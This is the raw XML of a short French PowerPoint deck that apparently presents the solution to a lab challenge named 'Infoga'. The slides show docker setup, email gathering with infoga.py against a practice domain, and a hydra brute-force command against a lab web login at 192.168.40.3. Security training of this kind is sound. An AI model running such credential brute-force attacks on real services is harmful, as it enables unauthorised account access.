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FC4EE7-B5A7-B579-2CBE-C829CCD14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156E22-779B-78F2-E7D1-C3FA364DC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14109C-2EB8-2551-D676-60BB35E5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6BA8-88C1-46EC-92CD-FF21864ED013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B8B217-2BE8-076B-5BAA-95ABF524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897288-E56F-2FEA-909E-F83C7720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DDA8-7095-4170-9A3B-985A8829EC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39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8E1C6-0B2D-6154-CADD-81BB4255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CC9FA3-E65C-6431-BB25-215D62BF9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AF60C6-DA83-56F0-CE73-30918EDB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6BA8-88C1-46EC-92CD-FF21864ED013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F10EB2-ED58-CA4A-913B-98EFB240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EC00BC-3B03-D40D-2F83-48F6B07F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DDA8-7095-4170-9A3B-985A8829EC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35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B2E103-517C-A09D-51D2-671A19642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4207B9-EA3D-0B39-3A6E-5CDE2830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295282-CF13-E9FC-6892-855A928F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6BA8-88C1-46EC-92CD-FF21864ED013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5E0705-2329-C1C4-74B4-C2C841B0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70CEB7-D8B4-655D-98B8-775E1D86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DDA8-7095-4170-9A3B-985A8829EC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50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3F4572-8E43-A057-080F-AA841626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7AA822-CB6A-121E-C69F-15E3CDE35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7B1657-FC62-3DBA-07D4-166137FA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6BA8-88C1-46EC-92CD-FF21864ED013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770452-FB47-1040-1C0A-BDA362EE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9DB47D-4D6F-4141-0759-8A256D6C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DDA8-7095-4170-9A3B-985A8829EC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72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689096-61C0-26D0-3C99-124C22FE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B5D467-6816-BFA5-672A-6743D6A45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D7285B-DDCB-FE58-CC35-92A3339E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6BA8-88C1-46EC-92CD-FF21864ED013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0ED21E-8A2A-3120-3A0B-442C2858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395495-8414-BDBE-5DCD-F8A328BC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DDA8-7095-4170-9A3B-985A8829EC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26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5A86-F180-FC04-C5FD-EEAAEEA5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569E9A-422F-D747-898C-51352CB11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746BEE-546C-D320-19F5-DB017C90C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D8DBBA-3475-0FC1-5E58-02A4F778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6BA8-88C1-46EC-92CD-FF21864ED013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DB7ABE-B83B-047F-0E65-52EC46030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53BA69-A3D5-019D-855C-A0EF4A79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DDA8-7095-4170-9A3B-985A8829EC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41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636C25-CA3B-B220-9203-CBCD8778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949F8E-B5EC-2977-9F6C-06D2F23AD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C90BE8-D9FC-0E8F-8837-CEBCEE592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E911BD6-6A7B-004C-61D8-8E9175F7F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321E0F-507A-CECC-8E95-01692690E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FB95C9-3921-9A74-7A9B-CE7377B1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6BA8-88C1-46EC-92CD-FF21864ED013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8834359-8D28-4E9C-A08D-F1C35735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84B41F7-366D-0EA0-DDCF-19FCE636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DDA8-7095-4170-9A3B-985A8829EC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86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2588B-4E18-D445-1196-CF81EAA0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D69C87-C1B7-B25C-F935-32A049F0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6BA8-88C1-46EC-92CD-FF21864ED013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6B7EDC-7AA7-18B5-9E61-24E20F46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D73244-6231-FFF7-EBCA-1C8EA081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DDA8-7095-4170-9A3B-985A8829EC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83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0F845A-5DA0-24FF-A7AC-FEF0A454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6BA8-88C1-46EC-92CD-FF21864ED013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73EBD9-4559-83C2-4937-5482F83F6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58380D-613C-0E98-D427-C6EDD68F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DDA8-7095-4170-9A3B-985A8829EC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00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CE199F-803D-A352-DAC6-FAA777F0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FBD111-9DD3-EC06-940F-094AB5BA7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B7B0D9-8451-45E3-267B-7DA9605AA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5DC766-DB3B-8090-7C18-11E1642E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6BA8-88C1-46EC-92CD-FF21864ED013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8548D7-5817-4DCA-1806-F1EA7C5A8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7394FD-4825-BA7B-CA1C-CC13AF35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DDA8-7095-4170-9A3B-985A8829EC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21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AE038C-FD08-8026-729F-B907FF70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CD70BA-A79D-4A70-18CE-6A9388515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29000A-5D94-77D2-ADA5-379C53A0E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A68AF8-69D9-4798-0E6D-DA7A0FE5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6BA8-88C1-46EC-92CD-FF21864ED013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8109AB-BD48-478E-485D-9D153A1F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4C7A49-798D-7E3D-8279-BB0959E7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DDA8-7095-4170-9A3B-985A8829EC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01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01CED10-B4F0-207B-6DDF-2C87F779C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B28983-086A-6281-2E10-BF872D911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E818D-1383-75CE-F5BA-F321563AC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F6BA8-88C1-46EC-92CD-FF21864ED013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F9EFF2-C738-4299-6DB7-68E307E65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93CFC0-0767-4BC5-2072-8DB2D5199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EDDA8-7095-4170-9A3B-985A8829EC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0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john.doe@secyourde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CD95B-3456-C648-A747-3B2824704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Solution challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Infoga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747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CA927-852B-5E57-B885-B805D5AE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docker-compose up --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>build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5A3C9-3AD2-2E51-D722-8EC895215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récupère le fichier docker-compose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On l’exécute avec le commande ci-dessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On accède ensuite à la machine avec l’outil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>infoga</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –ti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>infoga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> /bin/sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338620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EBAC9-CF57-9B34-9F56-2266C05F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python infoga.py –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>secyourdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t> –source all –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1"/>
              <a:t>breach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t> –v 2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5DD7877-6B2D-1C36-D138-7DE7FBE27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64" y="1690688"/>
            <a:ext cx="8584929" cy="503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5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9DEB3D-808A-A718-0284-B33FEC19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hydra –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>john.doe@secyourdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> –P mdp.txt 192,168,40,3 http-post-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t> ‘’/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>index.php:email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>=^USER^&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0"/>
              <a:t>=^PASS^:F=nom’’ -V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FD9124B-20F7-27B9-944C-DFC783BCB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277" y="1877309"/>
            <a:ext cx="12019446" cy="3103381"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27085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E5DFAD-3A29-C936-C856-18D10858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http://192.168.40.3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29AA14-C8AB-44AE-3C20-AF463F94A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31" y="1690688"/>
            <a:ext cx="9191719" cy="478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801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88</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>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Solution challenge Infoga</vt:lpstr>
      <vt:lpstr>docker-compose up --build</vt:lpstr>
      <vt:lpstr>python infoga.py –domain secyourdev –source all –breach –v 2</vt:lpstr>
      <vt:lpstr>hydra –l john.doe@secyourdev –P mdp.txt 192,168,40,3 http-post-form ‘’/index.php:email=^USER^&amp;password=^PASS^:F=nom’’ -V</vt:lpstr>
      <vt:lpstr>http://192.168.40.3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challenge Infoga</dc:title>
  <dc:creator>Arthur WANG</dc:creator>
  <cp:lastModifiedBy>Arthur WANG</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-11T09:30:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-11T12:29:29Z</dcterms:modified>
</cp:coreProperties>
</file>